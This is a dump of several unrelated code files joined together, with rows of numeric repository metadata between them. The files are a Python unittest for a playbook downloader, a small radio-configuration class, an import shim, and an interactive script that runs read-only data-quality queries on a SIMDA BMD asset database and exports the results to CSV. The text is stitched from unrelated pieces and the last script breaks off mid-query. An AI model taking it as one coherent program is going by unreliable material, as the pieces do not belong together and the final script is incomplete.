self.reqeust.iter_content.return_value = 'hello'
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_no_parsing_from_rfc(self):
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_with_one_yaml_only_credentials(self):
auth = HttpAuth("user", "pass", None)
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = 'hello'
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(side_effect=self.mock_response_valid_for_credentials)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_with_one_yaml_only_token(self):
auth = HttpAuth(None, None, "Token")
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = 'hello'
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(side_effect=self.mock_response_valid_for_not_public)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_with_one_yaml_only_token_with_auth_private_token(self):
auth = HttpAuth(None, None, "Token")
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml'), ('Private-Token', 'Token')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = 'hello'
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(side_effect=self.mock_response_valid_for_private_token)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_fails_on_public_and_no_credentials(self):
    """get() raises with a helpful message when no validation attempt succeeds and no auth was given."""
    self.reqeust.url = "blabla/lie.zip"
    self.reqeust.headers = {'content-disposition': 'lie.zip'}
    self.reqeust.iter_content.return_value = ''
    self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
    self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
    self.playbook_downloader._is_response_valid = Mock(return_value=False)
    with self.assertRaises(Exception) as ctx:
        self.playbook_downloader.get("", None, self.logger, Mock(), True)
    self.assertEqual(
        str(ctx.exception),
        "Please make sure the URL is valid, and the credentials are correct and necessary.")
# Helper side-effects for _is_response_valid: each simulates which auth
# attempt (public / username+password / token) the downloader should accept.
def mock_response_valid_for_not_public(self, logger, response, request_method):
    """Accept every request method except the anonymous "public" attempt."""
    return "public" != request_method
def mock_response_valid_for_credentials(self, logger, response, request_method):
    """Accept only the username/password attempt (note: literal backslash in the tag)."""
    return "username\password" == request_method
def mock_response_valid_for_private_token(self, logger, response, request_method):
    """Accept a response only when it carries a 'Private-Token' header."""
    header_map = response.headers
    return 'Private-Token' in header_map
| 52.327273
| 141
| 0.706278
| 1,091
| 8,634
| 5.285976
| 0.105408
| 0.087741
| 0.062424
| 0.076296
| 0.812901
| 0.78481
| 0.757239
| 0.750997
| 0.733657
| 0.723773
| 0
| 0.000143
| 0.187399
| 8,634
| 165
| 142
| 52.327273
| 0.821836
| 0.01193
| 0
| 0.630769
| 0
| 0
| 0.088042
| 0
| 0
| 0
| 0
| 0
| 0.084615
| 1
| 0.107692
| false
| 0.053846
| 0.046154
| 0.023077
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
5c12a3c588902f63ddf29558d9b949394d6dbd8d
| 151
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_Datasheet.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_Datasheet.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_Datasheet.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.jumbo.phys.Phys_Datasheet import PHYS_Datasheet
class PHYS_Datasheet_Nixi(PHYS_Datasheet):
    """Nixi datasheet PHYs: everything is inherited unchanged from the Jumbo implementation."""
| 25.166667
| 72
| 0.81457
| 20
| 151
| 5.9
| 0.55
| 0.440678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13245
| 151
| 5
| 73
| 30.2
| 0.900763
| 0.119205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
5c1e5bdb79789ad6eb950e94240e0029209d0919
| 83
|
py
|
Python
|
__init__.py
|
atsommer/delambre
|
98de94baba3d7994db6be964aaa8bd36b764173f
|
[
"MIT"
] | 1
|
2020-05-01T18:29:12.000Z
|
2020-05-01T18:29:12.000Z
|
__init__.py
|
atsommer/delambre
|
98de94baba3d7994db6be964aaa8bd36b764173f
|
[
"MIT"
] | null | null | null |
__init__.py
|
atsommer/delambre
|
98de94baba3d7994db6be964aaa8bd36b764173f
|
[
"MIT"
] | 1
|
2020-05-01T18:29:15.000Z
|
2020-05-01T18:29:15.000Z
|
# Prefer a top-level SImodule (e.g. when run as a loose script); fall back to
# the package-relative import when loaded as part of this package.
try:
    from SImodule import SI
except ImportError:
    from .SImodule import SI
| 20.75
| 29
| 0.722892
| 11
| 83
| 5.454545
| 0.636364
| 0.4
| 0.6
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.240964
| 83
| 4
| 29
| 20.75
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5c4a937c8d705e9e03d97bbe26860b5ef0114f97
| 28,258
|
py
|
Python
|
cekUpdateBMD2.0.7.10.py
|
hoaaah/cekibmd
|
39e2d177228283d7e4cbbfc61af59505a507c59e
|
[
"MIT"
] | null | null | null |
cekUpdateBMD2.0.7.10.py
|
hoaaah/cekibmd
|
39e2d177228283d7e4cbbfc61af59505a507c59e
|
[
"MIT"
] | null | null | null |
cekUpdateBMD2.0.7.10.py
|
hoaaah/cekibmd
|
39e2d177228283d7e4cbbfc61af59505a507c59e
|
[
"MIT"
] | null | null | null |
import os, sys
import checkfile, json, pymssql, pymysql, threading, time, itertools, vigenere, csv
from pprint import pprint
from getpass import getpass
# (C) Copyright 2018 Heru Arief Wijaya (http://belajararief.com/) untuk INDONESIA.
done = False  # global stop flag read by animate(); set True to end the spinner loop
def animate():
    """Render a "Push Data" console spinner until the module-level `done` flag is set.

    Intended to run on its own thread; redraws in place via carriage return
    roughly every 0.1s, then overwrites the line with "Done!".
    """
    frames = itertools.cycle(['|', '/', '-', '\\'])
    while not done:
        sys.stdout.write('\rPush Data ' + next(frames))
        sys.stdout.flush()
        time.sleep(0.1)
    sys.stdout.write('\rDone! ')
def set_interval(func, sec):
    """Invoke `func` every `sec` seconds using chained threading.Timer objects.

    Returns the first Timer; note that cancel() on it only stops the pending
    tick, since each tick schedules a fresh Timer before calling `func`.
    """
    def _tick():
        # Reschedule first so a slow/raising func does not stop the chain.
        set_interval(func, sec)
        func()
    timer = threading.Timer(sec, _tick)
    timer.start()
    return timer
status = False  # global stop flag read by selesai(); set True to end that spinner loop
def selesai():
    """Render an anonymous console spinner until the module-level `status` flag is set.

    Counterpart of animate() but without a label; meant to run on a worker
    thread while the database checks execute.
    """
    frames = itertools.cycle(['|', '/', '-', '\\'])
    while not status:
        sys.stdout.write('\r ' + next(frames))
        sys.stdout.flush()
        time.sleep(0.1)
    sys.stdout.write('\rDone! ')
# ---------------------------------------------------------------------------
# Main interactive flow: connect to the SIMDA BMD SQL Server database, run a
# series of data-quality checks ("Permasalahan" 1-9, 6 skipped) and dump every
# offending row plus its suggested fix into output.csv.
# ---------------------------------------------------------------------------
print ("Selamat datang di Cek UPDATE SIMDA BMD 2.0.7.10 ---- v1.0.0 by @hoaaah")
print ("Aplikasi ini akan melakukan pengecekan terhadap permasalahan pada DB BMD sebelum dilakukan updating ke versi 2.0.7.10.")
# NOTE(review): `key` appears unused in this visible flow (as does the
# vigenere import) — presumably leftovers from an encryption feature; confirm.
key = {
    'key1': 'donnoWhatToDo',
    'key2': 'yesManPaleLo'
}
# Interactive credentials; getpass() hides the password echo.
sourceServer, sourceUsername, sourcePassword, sourceDb = input("Server: "), input("Username: "), getpass(), input("Source Database: ")
print("""------Memeriksa Koneksi-------""")
try:
    sourceConn = pymssql.connect(sourceServer, sourceUsername, sourcePassword, sourceDb)
# NOTE(review): pymssql failures raise pymssql-specific errors (e.g.
# OperationalError), not builtin ConnectionError — this handler likely never
# fires, and on failure `sourceConn` is undefined when the `if` below runs
# (NameError). TODO confirm and catch pymssql.Error instead.
except ConnectionError:
    print("""
[x] Data Source Connection failed, check again your config.json
""")
finally:
    print("""
""")
if (sourceConn):
    print(""" [v] Source Connection Valid""")
# write to CSV first
# NOTE(review): open() without newline='' produces blank rows on Windows and
# the handle is never closed — consider `with open("output.csv", "w", newline='')`.
writeToCsv = csv.writer(open("output.csv", "w"))
# Background spinner while the checks run; stops when `status` becomes truthy.
t = threading.Thread(target = selesai)
t.start()
# --- Check 1: history (riwayat) rows whose IDPemda has no parent KIB row ---
print("""
------Memeriksa Permasalahan 1-------
Permasalahan 1 yaitu ID Pmeda di Riwayat tidak memiliki induk pada KIB Induk""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBAR a LEFT JOIN Ta_KIB_A b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if(result == 0) :
    print("------Permasalahan 1 Passed-------")
else:
    print("------Terdapat ",result," permasalahan-------")
    # On failure: write the fix description, a header row, then the offending rows.
    writeToCsv.writerow(['Permasalahan 1: Solusi data riwayat yang tidak ada induk akan dihapus.'])
    writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
    writeToCsv.writerows(sourceRow)
# --- Check 2: duplicate register numbers within one asset classification ---
print("""
------Memeriksa Permasalahan 2-------
Permasalahan 2 yaitu terdapat no register ganda untuk suatu jenis aset""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_A
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
UNION ALL
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_B
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
UNION ALL
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_C
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
UNION ALL
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_D
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
UNION ALL
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_E
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
    print("------Permasalahan 2 Passed-------")
else:
    print("------Terdapat ",result," permasalahan-------")
    writeToCsv.writerow(['Permasalahan 2: Solusi perbaikan fungsi perhitungan no register.'])
    writeToCsv.writerow(['Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'jumlah'])
    writeToCsv.writerows(sourceRow)
# --- Check 3: acquisition date mismatch between KIB parent and its history ---
print("""
------Memeriksa Permasalahan 3-------
Permasalahan 3 yaitu Tanggal Perolehan di KIB Berbeda dengan di KIB Riwayat""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBAR a LEFT JOIN Ta_KIB_A b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
UNION ALL
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
UNION ALL
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
UNION ALL
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
UNION ALL
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
    print("------Permasalahan 3 Passed-------")
else:
    print("------Terdapat ",result," permasalahan-------")
    writeToCsv.writerow(['Permasalahan 3: Solusi penyesuaian tanggal perolehan di riwayat mengikuti perolehan di KIB Induk'])
    writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
    writeToCsv.writerows(sourceRow)
# --- Check 4: for transfer rows (Kd_Riwayat = 3), booking date must equal document date ---
print("""
------Memeriksa Permasalahan 4-------
Permasalahan 4 yaitu Tanggal Pembukuan Berbeda dengan Tanggal Dokumen Pindah (untuk aset yang pindah skpd)""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBAR a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
    print("------Permasalahan 4 Passed-------")
else:
    print("------Terdapat ",result," permasalahan-------")
    writeToCsv.writerow(['Permasalahan 4: Solusi penyesuaian tanggal pembukuan dengan tanggal dokumen pindah.'])
    writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
    writeToCsv.writerows(sourceRow)
# --- Check 5: condition reverted to GOOD after a damaged asset was transferred ---
# NOTE(review): only tables B-E are queried here — Ta_KIBAR/Ta_KIB_A is not
# covered, unlike the other checks; confirm whether that is intentional.
print("""
------Memeriksa Permasalahan 5-------
Permasalahan 5 yaitu Aset dirubah kondisi RB lalu indah skpd, kondisinya kembali ke BAIK""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub,
a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen,
a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a
LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda
LEFT JOIN
(
SELECT * FROM Ta_KIBBR d WHERE d.Kd_Riwayat = 1
) c ON a.IDPemda = c.IDPemda AND (a.No_Urut - c.No_Urut) = 1
WHERE a.Kd_Riwayat = 3 AND ((a.Kondisi = 1 AND b.Kondisi = 3) OR (a.Kondisi = 1 AND c.Kondisi = 3))
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub,
a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen,
